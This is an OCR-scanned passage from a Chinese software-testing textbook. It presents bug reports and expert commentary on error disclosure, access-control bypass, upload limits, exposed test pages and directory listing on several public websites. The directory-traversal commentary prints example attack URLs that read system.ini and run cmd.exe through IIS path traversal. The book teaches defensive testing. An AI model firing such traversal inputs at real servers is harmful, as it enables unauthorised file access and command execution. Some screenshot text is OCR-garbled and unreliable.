(3) 在 RSS 页 面 单 击 任意 链接 ,例如 Acunetix Web Vulnerability Scanner beta 
released! 。 
期 望 结果 页 面 正常 跳 转 。 
实际 结果 ”出 现 HTTP Error 403 错误 ,如 图 4-31 所 示 。 





















EJ [B http/estaspnetacunetix.. D ~ Ó | @ rhe page cannot be disp. x 
XHA MMO BEV CUERO) IAM WAH 
Ñ +- E) + — @ + mm- 297 IRO - @- Ë 











The page cannot be displayed 


You have attempted to execute a CGI, ISAPI, or other executable program from a. 
| directory that does not allow programs to be executed. 





Please try the following: 
> Contact the Web ste administrator f you believe this directory should allow 
execute access. 
HTTP Error 403.1 - Forbidden: Execute access is denied. 
Internet Information Services (IIS) 





Technical information (for support personnel) 


* Go to Microsoft Product Support Services and perform a titie search for the 
words HTTP and 403. 

* Open IIS Help, which is accessible in TIS Manager (inetmor), and search for 
topics titled Configuring ISAPT s Applications, 
Securing Your Site with Web Site Permissions, and About Custom Error 


Messages. 

* In the IS Software Development Kit (SDK) or at the MSDN Online Library, 
search for topics titled Developing ISAPI Extensions. ISAPI and CGI and 

Debugging ISAPI Extensions and Filters. 


























4-31. 出现 HTTP Error 403 错误 


x 专家 点 评 


HTTP Error 403 是 网 站 访问 过 程 中 常见 的 错误 提示 ,表示 资源 不 可 用 ,服务 器 理解 客 
户 的 请 求 ,但 拒绝 处 理 它 。 通 常 是 由 于 服务 器 上 文件 或 目录 的 权限 设置 所 导致 的 。 

开发 工程 师 应 该 尽 可 能 避免 出 现 这 样 的 错误 ,至 少 要 跳 转 到 一 个 友好 的 页 面 。 

以 下 是 IIS 403 错误 详细 原因 。 

403. 1 错误 是 由 于 “执行 "访问 被 禁止 而 造成 的 ,车 试图 从 目录 中 执行 CGI、ISAPI 或 其 
他 可 执行 程序 ,但 该 目录 不 允许 执行 程序 时 便 会 出 现 此 种 错误 。 
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403. 2 错误 是 由 于 “ 读 取 ”访问 被 禁止 而 造成 的 。 导 致 此 错误 是 由 于 没有 可 用 的 默认 网 
页 并 且 没 有 对 目录 启用 目录 浏览 ,或 者 要 显示 的 HTML 网 页 所 驻 留 的 目录 仅 标 记 为 “可 执 
行 ?或 “脚本 ”权限 。 

403. 3 错误 是 由 于 “ 写 ” 访 问 被 禁止 而 造成 的 。 当 试图 将 文件 上 传 到 目录 或 在 目录 中 修 
改 文件 ,但 该 目录 不 允许 “ 写 ” 访 问 时 就 会 出 现 此 种 错误 。 

403. 4 错误 是 由 于 要 求 SSL 而 造成 的 ,必须 在 要 查看 的 网 页 的 地 址 中 使 用 https. 

403. 5 错误 是 由 于 要 求 使 用 128 位 加 密 算 法 的 Web 浏览 器 而 造成 的 。 如 果 浏 览 器 不 
支持 128 位 加 密 算法 就 会 出 现 此 种 错误 ,可 以 连接 微软 网 站 进行 浏览 器 升级 。 

403. 6 错误 是 由 于 IP 地 址 被 拒绝 而 造成 的 。 如 果 服 务 器 中 有 不 能 访问 该 站 点 的 IP 地 
址 列表 ,并 且 用 户 使 用 的 IP 地 址 在 该 列表 中 时 就 会 出 现 此 种 信息 。 

403. 7 错误 是 因为 要 求 客户 证 书 。 当 需要 访问 的 资源 要 求 浏览 器 拥有 服务 器 能 够 识别 
的 安全 套 接 字 层 (SSL) 客 户 证 书 时 会 出 现 此 种 错误 。 

403. 8 错误 是 由 于 禁止 站 点 访问 而 造成 的 , 若 服务 器 中 有 不 能 访问 该 站 点 的 DNS 名 称 
列表 ,而 用 户 使 用 的 DNS 名 称 在 列表 中 时 就 会 出 现 此 种 错误 。 请 注意 区 别 403.6 与 403.8 
错误 。 

403. 9 错误 是 由 于 连接 的 用 户 过 多 而 造成 的 。 由 于 Web 服务 器 很 忙 , 因 通信 量 过 多 而 
无 法 处 理 请 求 时 便 会 出 现 此 种 错误 。 

403. 10 错误 是 由 于 无 效 配置 而 导致 的 。 当 用 户 试图 从 目录 中 执行 CGI、ISAPI 或 其 他 
可 执行 程序 ,但 该 目录 不 允许 执行 程序 时 便 会 出 现 此 种 错误 。 

403. 11 错误 是 由 于 密码 更 改 而 导致 无 权 查看 页 面 。 

403. 12 错误 是 由 于 映射 器 拒绝 访问 而 造成 的 。 若 要 查看 的 网 页 要 求 使 用 有 效 的 客户 
证 书 , 而 用 户 的 客户 证 书 映射 没有 权限 访问 该 Web 站 点 ,就 会 出 现 此 种 错误 。 

403. 13 错误 是 由 于 需要 查看 的 网 页 要 求 使 用 有 效 的 客户 证 书 , 而 用 户 使 用 的 客户 证 书 
已 经 被 吊销 或 者 无 法 确定 证 书 是 否 已 吊销 造成 的 。 

403. 14 错误 是 由 于 Web 服务 器 被 配置 为 不 列 出 此 目录 的 内 容 , 拒 绝 目录 列表 而 造 
成 的 。 

403. 15 错误 是 由 于 客户 访问 许可 过 多 而 造成 的 , 当 服 务 器 超出 其 客户 访问 许可 限制 时 
会 出 现 此 种 错误 。 

403. 16 错误 是 由 于 客户 证 书 不 可 信 或 者 无 效 而 造成 的 。 

403. 17 错误 是 由 于 客户 证 书 已 经 到 期 或 者 尚未 生效 而 造成 的 。 

403. 18 错误 是 由 于 在 当前 的 应 用 程序 池 中 不 能 执行 所 请 求 的 URL(IIS 6.0 专 有 ) 。 

403. 19 错误 是 由 于 不 能 为 这 个 应 用 程序 池 中 的 客户 端 执行 CGI(IIS 6.0 专 有 ) 。 

403. 20 错误 是 由 于 Passport 登录 失败 (IIS 6.0 #4). 


4.19 XIR t 19. testfire 网 站 Internet server error 


缺陷 标题 testfire 网 站 一 Online Banking with FREE Online Bill Pay 页 面 存 在 500- 
Internet server error, 


测试 平台 与 浏览 器 Windows 7 十 IE 11 或 Chrome, 


实验 4 ”软件 技术 测试 训练 


测试 步骤 


(1) 打开 testfire 网 站 http://demo. testfire. net/ 。 
(2) 单 击 Online Banking with FREE Online Bill Pay 链接 。 


期 望 结 果 ” 跳 转 到 正确 的 Online Banking with FREE Online Bill Pay 页 面 。 
实际 结果 ”出现 500-Internal server error 页 面 ,并 且 页 面 上 有 错误 信息 ,如 图 4-32 所 示 。 






[À 500 - Internal server er x 


€> eí 









'e.net/default.aspx?content=personal_savings.htm eH 














500 - Internal server error. 
There is a problem with the resource you are looking for, and it cannot be displayed. 














An Error Has Occurred 
Summary: 


Could not find file 'C: downloads AltoroMutual. v6 website static personal. savings.htm'. 
Error Message: 


System.IO.FlieNotF: 
'C:\downloads\AltoroMutual_v6 \website\static\personal_savings.htm" at System.IO. Error. WinIOError(1nt32 errorCode, String maybeFullpath) at 


| v6 website default aspx.cs: iventArgFunctionCaller(IntPtr. 
EventArgs e) at System.Web.Uti.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System Web.UL.Control.OnLoad(EventArgs e) at 
System. Web.UI.Control.LcadRecursive() at System. Web. UI. Page. ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean 

int) 


PrvacvPolicy | Secunty Statement | € 2014 Aktoro Mutual, Inc. 


'oundException: Could not find file 'C: lownlcadsVAltorcMutual. v6lwebsitelstaticlpersonal. savings.htm'. File name: | 

















图 4-32 500-Internal server error 


xS 专家 点 评 


这 种 错误 出 现 的 原因 有 很 多 ,要 仔细 审查 清单 内 容 。500-Internal server error(500 内 
部 服务 器 错误 ) 是 一 个 常见 的 错误 ,仅仅 意味 着 “ 禄 糕 ,出 事 了 ,我 不 知道 这 是 什么 ,或 者 至 少 
我 不 会 公开 告诉 你 这 是 什么 ”。 

这 些 错误 的 实际 原因 将 会 记录 在 服务 器 上 ,而 不 会 被 显示 在 屏幕 上 ,因为 许多 原因 可 能 
与 安全 有 关 。 如 果 在 最 终 用 户 屏 幕 上 显示 原因 ,那么 周围 的 系统 提示 会 告诉 黑客 下 一 步 要 


做 什么 。 


本 实验 中 错误 信息 和 路 径 显示 在 出 错 网 页 上 ,会 对 网 站 构成 威胁 。 这 样 的 错误 是 


非常 严重 的 。 


4.20 XIZ #20: oricity 网 站 Query Error 


缺陷 标题 oricity 网 站 在 用 户 注销 后 的 页 面 中 操作 ,出 现 数据 库 搜索 错误 和 数据 库 服 
务 器 错误 。 
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测试 平台 与 浏览 器 Windows 7 十 IE 11 或 Firefox 或 Chrome. 
测试 步骤 

(1) 打开 oricity 网 站 http://www. oricity. com/. 

(2) 成 功 登 录 并 进入 该 账户 的 城市 空间 。 

(3) 单 击 页 面 右上 角 的 “注销 ”按钮 。 

(4) 单 击 左 侧 菜 单 中 的 “手机 和 信 设 置 ”菜单 。 
期 望 结果 ”提示 没有 访问 权限 等 信息 ,提示 用 户 登录 。 





€ > C [D wwworicity.com/user/mobile.php?action -show 





Query Error: select * from oc reject where id= 


The URL Is: 
http://www.oricity.com/user/mobile.php?action- show 


MySQL Server Error: 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near " at line 1 ( 1064 ) 


You Can Get Help In: 
http:/ /www.phpwind.net 














图 4-33 SQL 错误 页 面 
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SQL 搜索 错误 是 不 应 该 出 现在 已 上 线 网 站 中 的 ,如 果 在 页 面 中 出 现 某 些 重要 字段 ,是 
很 危险 的 。MySQL Server Error 这 样 的 错误 是 由 于 数据 库 无 法 链接 导致 的 ,这 些 和 数据 库 
相关 的 错误 信息 是 程序 员 在 编写 程序 时 应 该 看 到 而 在 正式 网 站 中 不 能 出 现 的 。 如 果 在 网 站 
中 出 现 ,就 是 非常 严重 的 Bug。 这 既 可 以 说 是 技术 性 的 Bug, 也 可 以 说 是 安全 性 的 Bug, 

当 用 户 已 经 退出 登录 ,并 设法 访问 以 前 只 有 登录 过 才能 访问 的 URL 或 使 用 某 种 功能 
时 ,应 该 直接 跳 转 到 登录 页 面 ,完成 身份 认证 后 ,才能 继续 操作 ,否则 就 会 出 现 许多 身份 认 
证 ,授权 出 错 方 面 的 Bug. 


地 拓展 训练 


找 出 以 下 网 站 的 技术 缺陷 。 

CD 城市 空间 http://www. oricity. com. 

(2) kiehl's 网 站 : http://www. kiehls. com, 

(3) 工作 计时 -实时 跟踪 远程 工作 网 : https://www. workcard. net. 


实验 4 ”软件 技术 测试 训练 


(4) 网 络 空间 安全 -信息 安全 技术 网 : http://www. roqisoft. com/infosec。 

(5) 在 线 会 议 -Zoom: https://www. zoom. us, 

(6) NBA 英文 网 : http://www. nba. comy/ 。 

CD 言 若 金 叶 微 信 公众 号 。 

提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 技术 相关 的 缺陷 。 
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读书 笔记 
4d e@; 4; e@; «4; e@; «4; o4: ed? 04: «4; e@; «4; ed: 


读书 笔记 Name: Date: 








励志 名 句 : Nobody can casually succeed « it comes from the thorough sel f- 


control and the will. 





谁 也 不 能 随 随 便便 成 功 , 它 来 自 彻 底 的 自我 管理 和 角力 。 


















































目的 ) 


探索 测试 (Exploratory Testing) 是 指 通 常用 于 没有 产品 说 明 书 
的 测试 ,这 需要 把 软件 当 作 产品 说 明 书 来 看 待 ,分 步骤 逐 项 探索 软件 
特性 ,记录 软件 执行 情况 ,详细 描述 功能 ,综合 利用 静态 和 动态 技术 进 
行 测试 。 探 索 测试 人 员 只 靠 智 能 、 洞 察 力 和 经 验 来 对 Bug 的 位 置 进 
行 判断 ,所 以 探索 测试 又 被 称 为 自由 形式 测试 。 探 索性 强调 测试 人 员 
的 主观 能 动 性 ,抛弃 繁杂 的 测试 计划 和 测试 用 例 设 计 过 程 , 强 调 在 碰 
到 问题 时 及 时 改变 测试 策略 。 

经 过 前 面 四 大 主题 的 经 典 软件 缺陷 寻找 过 程 , 相 信 每 位 读者 都 想 
体验 一 下 自己 的 真正 实力 。 探 索 测 试 是 一 个 测试 工程 师 个 人 实力 与 
技术 修养 的 体现 。 本 实验 将 带领 各 位 读者 共同 领略 各 位 工程 师 与 大 
学 生 竞赛 中 获奖 选手 的 技术 风采 。 


5.1 SBY 3 1; oricity 网 站 JavaScript 前 端 
控制 被 绕 行 


缺陷 标题 oricity 网 站 一 好 友 分 组 ,通过 更 改 URL 可 以 添加 超 
过 最 大 个 数 的 好 友 分 组 。 
测试 平台 与 浏览 器 Windows 7 十 IE 11 Chrome, 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/。 
(2) 使 用 正确 的 账户 登录 。 
(3) 单 击 账 户 名 称 ,进入 “我 的 城市 空间 ”页 面 。 
(4) 单 击 “ 好 友 分 组 ”, 添 加 好 友 分 组 到 最 大 个 数 10 个 ,此 时 
“添加 ”按钮 变 成 灰色 ,为 不 可 添加 状态 ,选择 一 个 分 组 , 单 
击 “ 修 改组 资料 ”。 
(5) f£ URL 后面 加 上 ?action 二 add, 按 Enter 键 。 
(6) 在 添加 页 面 输入 组 名 , 单 击 “ 确 定 ” 按 钮 。 
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Ne 


HAAR “不 能 添加 分 组 。 
实际 结果 第 11 个 分 组 添加 成 功 , 如 图 5-1 所 示 。 


D megn— Sia x 
€ > Q D www.oricity.com/user/friendgroup.php 
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图 5-1 添加 了 11 个 分 组 
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35 10 4 27 ZU Jo Z R.Z 5 ,“ 36 3k IR is n E ORT HE dim anat a 39 JS 判断 
正确 ,但 是 当 编 辑 分 组 ,更 改 URL 为 添加 页 面 的 URL 4F_E ?action add 时, 却 可 以 添加 成 
功 , 说 明 后 端 服务 器 程序 并 没有 验证 是 否 已 达到 最 大 限制 ,这 是 标准 的 安全 技术 问题 。 

A7-Missing Function Level Access Control 在 2013 年 Web 安全 排名 第 7 位 。 功 能 级 
访问 控制 缺失 ,大 部 分 Web 应 用 在 界面 上 进行 了 应 用 级 访问 控制 ,但 是 应 用 服务 器 端 也 要 
进行 相应 的 访问 控制 。 如 果 请 求 没有 服务 器 端 验证 ,攻击 者 就 能 够 构造 请 求 访问 未 授权 的 
功能 。 


5.2 实验 #2; oricity 网 站 上 传 文件 大 小 限制 问题 


缺陷 标题 “oricity 网 站 一 个 人 中 心 一 我 的 相册 中 图 片上 传 ,可 上 传 超过 限制 大 小 的 
图 片 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/ , 
(2) 登录 , 单 击 [X XX 的 城市 空间 ], 在 “我 的 相册 ”目录 下 找到 “图 片上 传 ”。 
(3) 选择 超过 限制 的 图 片 并 上 传 ,如 图 5-2 所 示 。 
(4) 查看 上 传 结果 。 
期 望 结果 ”上传 失 败 , 并 提示 。 
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图 5-2 ”可 以 上 传 超过 限制 的 图 片 
实际 结果 能 上 传 ,并 能 打开 。 


xS 专家 点 评 


文件 上 传 部 分 经 常 出 现 安全 问题 : 一 种 是 文件 大 小 限制 不 工作 ,或 能 被 轻易 攻击 导致 
文件 大 小 限制 不 工作 ; 另 一 种 是 文件 类 型 没 做 限制 ,导致 能 上 传 病毒 文件 至 服务 器 中 ,破坏 





服务 器 中 的 源 程序 或 其 他 有 用 文件 。 
对 于 文件 上 传 , 一 般 需 要 考虑 以 下 测试 。 
1. 功能 测试 


(1) 选择 符合 要 求 的 文件 ,上 传 ,上 传 成 功 。 

(2) 上 传 成 功 的 文件 名 称 显示 ,显示 正常 (根据 需求 ) 。 

(3) 查看 /下 载 上 传 成 功 的 文件 ,上 传 的 文件 可 查看 或 下 载 。 
(4) 删除 上 传 成 功 的 文件 ,可 删除 。 

(5) 替换 上 传 成 功 的 文件 ,可 替换 。 

(6) 上 传 文件 是 否 支持 中 文 名 称 , 根 据 需求 而 定 。 

(7) 文件 路 径 是 否 可 手动 输入 ,根据 需求 而 定 。 

(8) 手动 输入 正确 的 文件 路 径 , 上 传 , 上 传 成 功 。 

(9) 手动 输入 错误 的 文件 路 径 , 上 传 , 提 示 不 能 上 传 。 

2. 文件 大 小 测试 

CD 符合 格式 ,总 大 小 稍 小 于 限制 大 小 的 文件 ,上 传 成 功 。 
(2) 符合 格式 ,总 大 小 等 于 限制 的 大 小 的 文件 ,上 传 成 功 。 
(3) 符合 格式 ,总 大 小 稍 大 于 限制 大 小 的 文件 ,在 上 传 时 提示 附件 过 大 ,不 能 上 传 。 
(4) 大 小 为 OKB 的 TXT 文档 ,不 能 上 传 。 
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3. 文件 名 称 测试 

COD 文件 名 称 过 长 。Windows 2000 标准 为 255 个 字符 ( 指 在 英文 的 字符 下 ), 如 果 是 中 
文 则 不 超过 127 个 汉字 ,否则 提示 过 长 。 

(2) 文件 名 称 达 到 最 大 长 度 ( 中 文 、 英 文 或 混在 一 起 ) 上 传 后 显示 名 称 ,页 面 排版 ,页 面 
显示 正常 。 

(3) 文件 名 称 中 包含 特殊 字符 ,根据 需求 而 定 。 

(4) 文件 名 全 为 中 文 , 根 据 需求 而 定 。 

(5) 文件 名 全 为 英文 ,根据 需求 而 定 。 

(6) 文件 名 为 中 英文 混合 ,根据 需求 而 定 。 

4. 文件 格式 测试 

(1) 上 传 正 确 格 式 , 上 传 成 功 。 

(2) 上 传 不 允许 的 格式 ,提示 不 能 上 传 。 

(3) 上 传 RAR、ZIP 等 打包 文件 (多 文件 压缩 ) ,根据 需求 而 定 。 

5. 安全 性 测试 

(1) 上 传 可 执行 文件 (EXE 文件 ) ,根据 需求 而 定 。 

(2) 上 传 常见 的 木马 文件 ,提示 不 能 上 传 。 

G) 上 传 时 服务 器 空间 已 满 , 有 提示 。 

6. 性 能 测试 

(1) 上 传 时 网 速 很 慢 ( 限 速 ), 当 超过 一 定时 间 , 有 提示 。 

(2) 上 传 过 程 断 网 ,有 提示 上 传 是 否 成 功 。 

(3) 上 传 过 程 服务 器 停止 工作 ,有 提示 上 传 是 否 成 功 。 

(4) 上 传 过 程 服务 器 的 资源 利用 这 ,在 正常 范围 。 

7. 界面 测试 

CD 页 面 美观 性 , 易 用 性 (键盘 和 鼠标 的 操作 、Tab 跳 转 的 顺序 是 否 正确 ) 。 

(2) 按钮 文字 是 否 正 确 。 

(3) 正确 /错误 的 提示 文字 是 否 正确 。 

(4) 说 明 性 文字 是 否 正确 。 

8. 冲突 或 边界 测试 

A) 有 多 个 上 传 框 时 ,上 传 相同 名 称 的 文件 。 

(2) 上 传 一 个 正在 打开 的 文件 。 

(3) 文件 路 径 是 手动 输入 的 是 否 限制 长 度 。 

(4) 上 传 文件 过 程 中 是 否 有 取消 正在 上 传 文件 的 功能 。 

(5) 保存 时 有 没有 已 经 选择 好 但 没有 上 传 的 文件 ,需要 提示 上 传 。 

(6) 选择 好 但 是 未 上 传 的 文件 是 否 可 以 取消 选择 ,需要 可 以 取消 选择 。 


5.3 ”实验 #3: oricity 网 站 权限 控制 错 403 Forbidden 


缺陷 标题 oricity 网 站 一 都 市 论坛 一 帮助 网 页 出 现 403 Forbidden, 
测试 平台 与 浏览 器 Windows 7 十 Firefox。 
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测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/ 。 
(2) 进入 都 市 论坛 , 单 击 “ 帮 助 ”, 查 看 页 面 。 

期 望 结果 页 面 正确 显示 。 

实际 结果 页面 出 现 403 Forbidden, 如 图 5-3 所 示 。 


[OE W 8 + e)a- aran 
访问 最 多 才 RAME 





Lodi 


pwu Ld " 
Ma UN > > KdCEESCEIE | WIAR | 帮助 | 首页 | <S 


e 城市 空间 论坛 -> 论坛 帮助 
注册 与 会 员 全 录 Ej 论坛 发帖 与 相关 名 限 | E PHPWind Ses mm | — minem 


403 Forbidden 


[quote] Walp, ERFAREN RAE 
" [quote] 












































ABIRE qosanpa 








[code] 





onsec (etat [61]) 7 
tateimplode('' txt) 7 
Sfetopen ("userdaza/xoni/market. data", "v') z 








fputa (41, erat); 
fclose (6t); 


DS em 


单 击 “帮助 ,应 该 出 现 关 于 该 网 站 的 一 些 帮 助 信息 ,但 是 这 里 出 现 403 Forbidden, š£ X 
示 网 站 内 部 代码 ,这 是 不 应 该 的 。 这 也 是 典型 的 Web 安全 功能 性 访问 控制 出 错 的 案例 。 

在 Web 安全 测试 中 ,权限 控制 出 错 的 例子 非常 多 。 

例如 ,用 户 A 在 电子 书籍 网 站 购买 了 3 本 电子 书 ,然后 用 户 A 单 击 书 名 就 能 阅读 这 些 
电子 书 , 每 本 电子 书 都 有 bookid, 用 户 A iñ ift X #& URL, 把 bookid 换 成 其 他 id, 就 有 可 能 免 
费 看 别人 购买 的 电子 书籍 。 

又 如 ,普通 用 户 A 拿 到 了 管理 员 的 URL, 试 图 去 运行 ,结果 发 现 自己 也 能 操作 管理 员 界面 。 

以 上 两 个 例子 是 缺少 功能 性 安全 访问 控制 。 也 有 出 现 过 分 安全 保护 导致 正常 用 户 无 法 
访问 所 需要 的 页 面 或 功能 。 本 实验 就 是 过 分 保护 导致 的 错误 。 


5.4 ”实验 #4: oricity 网 站 有 内 部 测试 网 页 


缺陷 标题 oricity 网 站 一 活动 详情 页 面 , 在 URL 后 面 添加 /test. php 出 现 测试 页 面 。 
测试 平台 与 浏览 器 Windows 7(64 bit) 十 Chrome 或 IE 11。 








图 5-3 页 面 出 现 403 Forbidden 
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测试 步骤 

(1) 打开 oricity 网 站 http://www. oricity. com/ 。 

(2) 单 击 任 一 活动 。 

(3) 修改 URL 为 http://www. oricity. com/event/test. php, f% Enter 键 。 
期 望 结果 ”不 存在 测试 页 面 。 
实际 结果 ”存在 测试 页 面 ,并 能 访问 ,如 图 5-4 所 示 。 





| D www.oricity.com/event/ x We 
€ > C (D wwworidty.com/event/test.php 





... OC No. 232 羽球 活动 
了 351 HERE 








图 5-4 网 站 存在 测试 页 面 


EO 专家 点 评 


软件 开发 人 员 经 常 为 调试 代码 或 功能 需要 增加 许多 内 部 测试 页 或 打印 一 些 Log H £ 
信息 ,但 这 些 测试 页 或 内 部 调试 信息 在 发 布 的 产品 上 需要 删除 掉 ; 如 果 的 确 有 用 途 , 那 需要 
进行 相应 的 身份 认证 ,不 能 侥幸 地 认为 URL 没 公布 出 去 别人 应 该 不 知道 。 实 际 上 ,Web 安 
全 扫描 工具 或 渗透 工具 能 用 网 络 爬 虫 技 术 遍 历 所 有 的 URL. 

$ Web 应 用 包含 一 些 “ 隐 藏 "的 URL, 这 些 URL 不 显示 在 网 页 链接 中 ,但 管理 员 可 
以 直接 输入 URL 访问 到 这 些 “ 隐 藏 ”" 页 面 。 如 果 不 对 这 些 URL 做 访问 限制 ,攻击 者 仍然 有 
机 会 打开 它们 。 

这 类 攻击 常见 的 情形 如 下 。 

(1) 某 商 品 网 站 举行 内 部 促销 活动 ,待定 内 部 员工 可 以 通过 访问 一 个 未 公开 的 URL 
链接 登录 公司 网 站 ,购买 特价 商品 ,此 URL 通过 某 员 工 泄露 后 ,导致 大 量 外 部 用 户 登 录 
购买 。 

(2) 某 公 司 网 站 包含 一 个 未 公开 的 内 部 员工 论坛 (http://example. com/bbs) ,攻击 者 
经 过 一 些 简单 的 尝试 就 能 找到 这 个 论坛 的 入 口 地 址 ,从 而 发 各 种 垃圾 帖子 或 进行 各 种 攻击 。 


5.5 实验 #5: NBA 网 站 files 目录 能 被 遍历 


缺陷 标题 NBA 网 站 files 目录 能 被 遍历 。 
测试 平台 与 浏览 器 ”Windows 7 十 Chrome 或 Firefox, 
测试 步骤 

(1) 打开 NBA 网 站 http://www. nba. com, 
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(2) f£ URL 后 面 补 上 files, 形 如 http://www. nba. com /files。 
期 望 结果 不 会 显示 files 目录 结构 。 
实际 结果 ”显示 files 目录 结构 ,并 且 继 续 向 后 遍历 目录 ,如 图 5-5 所 示 。 





€ > C D wwwnbacom/files/ 
Index of /files 


È Name Last modified Size Description 








01-Jan-2015 00:23 
18-Jul-2012 17:56 
28-Aug-2012 19:20 


z 
A 
A 


> 


2 Parent Directory 
nba/ 
nbautil/ 

B | static 





Apache Server at www.nba.com Port 80 








图 5-5 files 目录 能 被 遍历 


x wasis 


对 于 一 个 安全 的 Web 服务 器 来 说 ,对 Web 内 容 进 行 恰当 的 访问 控制 是 极为 关键 的 。 
目录 遍历 是 HTTP 存在 的 一 个 安全 漏洞 , 它 使 得 攻击 者 能 够 访问 受 限制 的 目录 ,并 在 Web 
服务 器 的 根 目 录 以 外 执行 命令 。 

Web 服务 器 主要 提供 两 个 级 别 的 安全 机 制 。 

COD 访问 控制 列表 , 即 常 说 的 ACL。 

(2) 根 目 录 访 问 。 

访问 控制 列表 是 用 于 授权 过 程 的 , 它 是 一 个 Web 服务 器 的 管理 员 用 来 说 明 什 么 用 户 或 
用 户 组 能 够 在 服务 器 上 访问 、 修 改 和 执行 某 些 文件 的 列表 ,同时 也 包含 了 其 他 一 些 访问 权限 
内 容 。 

根 目 录 是 服务 器 文件 系统 中 的 一 个 特定 目录 , 它 往往 是 一 个 限制 ,用 户 无 法 访问 位 于 这 
个 目录 之 上 的 任何 内 容 。 

例如 ,Windows 的 IIS 默认 的 根 目 录 是 C:\Inetpub\wwwroot, 那 么 用 户 一 旦 通过 了 
ACL 的 检查 ,就 可 以 访问 C:\Inetpub\wwwroot\news 目录 以 及 其 他 位 于 这 个 根 目 录 以 下 
的 所 有 目录 和 文件 ,但 无 法 访问 C:\Windows B. 

根 目 录 的 存在 能 够 防止 用 户 访问 服务 器 上 的 一 些 关 键 性 文件 ,如 在 Windows 平台 上 的 
cmd. exe 或 是 Linux/UNIX 平台 上 的 口令 文件 。 

这 个 漏洞 可 能 存在 于 Web 服务 器 软件 本 身 ,也 可 能 存在 于 Web 应 用 程序 的 代码 之 中 。 

要 执行 一 个 目录 遍历 攻击 ,攻击 者 所 需要 的 只 是 一 个 Web 浏览 器 ,并 且 有 一 些 关于 系 
统 的 默认 文件 和 目录 所 存在 的 位 置 的 知识 即 可 。 

如 果 网 站 存在 这 个 漏洞 ,那么 攻击 者 可 以 用 它 来 做 些 什么 ? 

利用 这 个 漏洞 ,攻击 者 能 够 走出 服务 器 的 根 目 录 , 从 而 访问 文件 系统 的 其 他 部 分 ,如 攻 
击 者 能 够 看 到 一 些 受 限制 的 文件 ,或 者 能 够 执行 一 些 造成 整个 系统 崩溃 的 指令 。 
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依赖 于 Web 站 点 的 访问 设置 ,攻击 者 能 够 仿冒 站 点 的 其 他 用 户 来 执行 操作 ,而 这 就 依 
赖 系统 对 Web 站 点 的 用 户 是 如 何 授权 的 。 

在 包含 动态 页 面 的 Web 应 用 中 ,输入 往往 是 通过 GET 或 是 POST 的 请 求 方法 从 浏览 
器 获得 ,http://test. webarticles. com/show. asp? view = oldarchive. html 是 一 个 GET 的 
HTTP URL 请 求 示例 。 利 用 这 个 URL, 浏 览 器 向 服务 器 发 送 了 对 动态 页 面 show. asp 的 
请 求 , 并 且 伴 有 值 为 oldarchive. html 的 view 参数 , 当 请 求 在 Web 服务 器 端 执行 时 ,show 
.asp 会 从 服务 器 的 文件 系统 中 取得 oldarchive. html 文件 ,并 将 其 返回 客户 端的 浏览 器 。 那 
么 ,攻击 者 就 可 以 假定 show. asp 能 够 从 文件 系统 中 获取 文件 并 编制 如 下 URL —— http: 
//test. XXX. com/show. asp?view ../../../../../ Windows/system. ini。 那 么 ,这 就 能 够 从 
文件 系统 中 获取 system. ini 文件 并 返回 给 用 户 。 攻 击 者 不 得 不 去 猜测 需要 往 上 多 少 层 才能 
找到 Windows 目录 ,但 可 想 而 知 ,这 其 实 并 不 困难 ,经 过 若干 次 的 尝试 后 总 会 找到 的 。 

除了 Web 应 用 的 代码 以 外 , Web 服务 器 本 身 也 有 可 能 无 法 抵御 目录 遍历 攻击 。 这 有 
可 能 存在 于 Web 服务 器 软件 或 是 一 些 存 放 在 服务 器 上 的 示例 脚本 中 。 

在 最 近 的 Web 服务 器 软件 中 ,这 个 问题 已 经 得 到 了 解决 。 但 是 ,网 上 的 很 多 Web 服务 
器 仍然 使 用 老 版 本 的 TIS 和 Apache, 它 们 可 能 仍然 无 法 抵御 这 类 攻击 。 即 使 使 用 了 已 经 解 
决 这 个 漏洞 的 版 本 的 Web 服务 器 软件 ,仍然 可 能 会 有 一 些 对 黑客 来 说 是 很 明显 的 存 有 敏感 
默认 脚本 的 目录 。 

例如 ,http://server. com/scripts/.. /55c.. /Windows/System32/cmd. exe? /c 十 dir 十 c:\ 
这 个 URL 请 求 使 用 了 IIS 的 脚本 目录 来 移动 目录 并 执行 指令 它 会 返回 C:\ 目 录 下 所 有 文 
件 的 列表 ,是 通过 调用 cmd. exe 然后 再 用 dir c:\ 来 实现 的 ,%5c 是 Web 服务 器 的 转换 符 ， 
用 来 代表 一 些 常见 字符 ,这 里 表示 的 是 \。 

新 版 本 的 Web 服务 器 软件 会 检查 这 些 转 换 符 并 限制 它们 通过 ,但 一 些 老 版 本 的 服务 器 
软件 仍然 存在 这 个 问题 。 

另外 ,本 实验 直接 访问 files 目录 ,是 因为 对 Web 开发 比较 熟练 ,一 般 Web 开发 的 目录 
结构 都 会 有 类 似 images photo js、css\html 之 类 的 目录 ,所 有 的 目录 结构 都 要 做 保护 处 理 ， 
不 能 让 人 直接 访问 ,和 否则 网 站 源 代 码 、 一 些 隐私 信息 都 有 可 能 泄露 。 


5.6 实验 #6: NBA 网 站 有 内 部 测试 网 页 


缺陷 标题 NBA 网 站 检测 到 测试 脚本 问题 。 
测试 平台 与 浏览 器 Windows 7 (64 bit) +IE 11 或 Chrome, 
测试 步骤 
(1) 打开 NBA 网 站 http://www. nba. com/test. html, 
(2) 观察 页 面 信息 ,并 查看 页 面 源 代码 。 
期 望 结果 不 显示 测试 脚本 信息 。 
实际 结果 ”显示 测试 脚本 信息 ,如 图 5-6 所 示 。 
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/body) 











图 5-6 显示 测试 脚本 信息 


E: 专家 点 评 
参见 5.4 节 实验 #4 的 专家 点 评 。 


5.7 实验 #7: NBA 网 站 Servlet 信息 泄露 


缺陷 标题 NBA 网 站 存在 Servlet 信息 泄露 问题 。 
测试 平台 与 浏览 器 Windows 7 (64 bit) 十 IE 11,Firefox 或 Chrome, 
测试 步骤 
